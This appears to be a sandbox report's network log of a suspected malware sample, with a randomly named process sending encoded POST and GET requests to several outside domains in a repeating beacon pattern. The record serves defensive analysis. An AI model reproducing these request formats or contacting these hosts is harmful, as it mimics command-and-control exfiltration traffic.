                                                                                                                                                                              Oct 31, 2024 01:39:59.920492887 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:00.940011978 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:00.945347071 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:00.945492029 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:00.955265045 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:00.960361004 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:01.570861101 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:01.570873976 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:01.570939064 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:01.571190119 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:01.571234941 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:02.469161987 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:03.486982107 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:03.492186069 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.492249012 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:03.508836985 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:03.513741970 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513752937 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513787985 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513798952 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513808012 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513946056 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513955116 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513991117 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513998985 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:04.158436060 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:04.158530951 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:04.158592939 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:04.190339088 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:04.190391064 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:05.014240026 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.059575081 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.064516068 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:06.064579010 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.120237112 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.125144958 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:06.732575893 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:06.732595921 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:06.732795000 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.764544964 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:06.764648914 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.767209053 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.773153067 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.023252964 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:12.028553009 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.028614044 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:12.043965101 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:12.048957109 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916357994 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916606903 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916616917 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916621923 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916631937 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916641951 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916654110 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916665077 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916688919 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:12.916765928 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:12.916765928 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:13.056739092 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:13.059407949 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:13.545542002 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:14.617553949 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:14.622447968 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:14.623666048 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:14.667103052 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:14.671919107 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514626026 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514656067 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514667034 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514676094 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514688969 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514697075 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:15.514710903 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514712095 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:15.514755011 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:15.654714108 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.654753923 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:16.170650005 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:17.191380978 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:17.196295977 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:17.199455023 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:17.211189985 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:17.216026068 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:17.216037989 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:57.136367083 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:57.137211084 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:57.393436909 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:58.409467936 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:58.414359093 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.414426088 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:58.427463055 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:58.649398088 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649487019 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649610043 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649678946 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649797916 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649844885 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649912119 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649920940 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.650088072 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:59.441508055 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:59.498644114 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:59.654007912 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:59.654057026 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:59.936258078 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:00.954317093 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:00.959203005 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:41:00.959419012 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:00.965365887 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:00.970163107 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:41:02.016932011 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:41:02.061922073 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:02.245409012 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:41:02.245500088 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:02.246767998 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:02.251513004 CET8050059152.42.255.48192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3132 | Process: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:37:49.766732931 CET | 452 | OUT | GET /nhtq/?78=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.iampinky.info
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:37:50.381314039 CET | 400 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 31 Oct 2024 00:37:50 GMT
Content-Type: text/html
Content-Length: 260
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?78=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&hrOd=1DzdIBZXhZaHw2Wp"}</script></head></html>


Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49778 | Destination IP: 103.120.80.111 | Destination Port: 80 | PID: 3132 | Process: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:06.439366102 CET | 704 | OUT | POST /3ej6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.cotti.club
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Connection: close
Origin: http://www.cotti.club
Referer: http://www.cotti.club/3ej6/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Data Ascii: 78=LdQH5CP2FleS0QX4wXN7UeKZRJkIAiVuxqdqlfWBvfIxAA9AypESMhwXrWD6d5mgoypOb3kbGZuTUG5MM7CtBhBGII+kh0WK+bxcA0LDr/hpCBIYAVAstAh8GfgNcxEVzDtd9aEr99a81hDStytZ1g8z5DUZnw4Ao2QvP9rLJXqk2dozQLggAWIS646sxlL/Sw==


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49793 | Destination IP: 103.120.80.111 | Destination Port: 80 | PID: 3132 | Process: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:08.989305973 CET | 724 | OUT | POST /3ej6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.cotti.club
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
Origin: http://www.cotti.club
Referer: http://www.cotti.club/3ej6/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Data Ascii: 78=LdQH5CP2FleS0wn4ywZ7S+KedpkILCVqxqRqleCrvq4xAhNAxtwSBBwXj2D7XZnsoylwbykbGaSTUHJMMoauBxBEHo+ivUWK+bxcA1v9r/JpCRYYPXkjzQh/P/gNWRERzDs+9bIR9+i81kvSsjtY8g813jVygzl0mEsiSd7yLky367lpB6B3SWshn/zY8m22J48UErKvW8gVrRVw6FSHc4w=


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49809 | Destination IP: 103.120.80.111 | Destination Port: 80 | PID: 3132 | Process: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:11.538006067 CET | 10806 | OUT | POST /3ej6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.cotti.club
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10299
Connection: close
Origin: http://www.cotti.club
Referer: http://www.cotti.club/3ej6/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Data Ascii: 78= [TRUNCATED]


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49825 | Destination IP: 103.120.80.111 | Destination Port: 80 | PID: 3132 | Process: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:14.076658964 CET | 449 | OUT | GET /3ej6/?78=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.cotti.club
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:38:15.034598112 CET | 1236 | IN | HTTP/1.1 200 OK
Server: wts/1.7.0
Date: Thu, 31 Oct 2024 00:38:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: "65517fce-1a10"
Data Ascii: 1a1a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>cotti.club-(www.west.cn)</title> <meta name="description" content="cotti.club," /> <meta name="keywords" content="cotti.club," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } [TRUNCATED]


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
5 | 192.168.2.4 | 49861 | 217.160.0.60 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:20.338640928 CET | 719 | OUT | POST /diem/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.solarand.online
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Connection: close
Origin: http://www.solarand.online
Referer: http://www.solarand.online/diem/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:38:21.176712036 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Thu, 31 Oct 2024 00:38:21 GMT
Server: Apache
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49876 | 217.160.0.60 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:22.877748013 CET | 739 | OUT | POST /diem/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.solarand.online
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
Origin: http://www.solarand.online
Referer: http://www.solarand.online/diem/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:38:23.716486931 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Thu, 31 Oct 2024 00:38:23 GMT
Server: Apache
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49889 | 217.160.0.60 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:25.621701956 CET | 10821 | OUT | POST /diem/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.solarand.online
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10299
Connection: close
Origin: http://www.solarand.online
Referer: http://www.solarand.online/diem/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:38:26.423516989 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Thu, 31 Oct 2024 00:38:26 GMT
Server: Apache
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49905 | 217.160.0.60 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:28.272735119 CET | 454 | OUT | GET /diem/?hrOd=1DzdIBZXhZaHw2Wp&78=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.solarand.online
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:38:29.080490112 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 4545
Connection: close
Date: Thu, 31 Oct 2024 00:38:28 GMT
Server: Apache
Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49941 | 161.97.142.144 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe

Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:34.271497965 CET | 713 | OUT | POST /2sun/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.030002059.xyz
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Connection: close
Origin: http://www.030002059.xyz
Referer: http://www.030002059.xyz/2sun/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:38:35.120378971 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 31 Oct 2024 00:38:35 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49957 | 161.97.142.144 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe

Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:36.828089952 CET | 733 | OUT | POST /2sun/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.030002059.xyz
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
Origin: http://www.030002059.xyz
Referer: http://www.030002059.xyz/2sun/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:38:37.663824081 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 31 Oct 2024 00:38:37 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49973 | 161.97.142.144 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe

Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:39.374445915 CET | 10815 | OUT | POST /2sun/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.030002059.xyz
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10299
Connection: close
Origin: http://www.030002059.xyz
Referer: http://www.030002059.xyz/2sun/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:38:40.214448929 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 31 Oct 2024 00:38:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49989 | 161.97.142.144 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe

Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:38:41.920389891 CET | 452 | OUT | GET /2sun/?78=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.030002059.xyz
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:38:42.752948999 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 31 Oct 2024 00:38:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2966
Connection: close
Vary: Accept-Encoding
ETag: "66cce1df-b96"
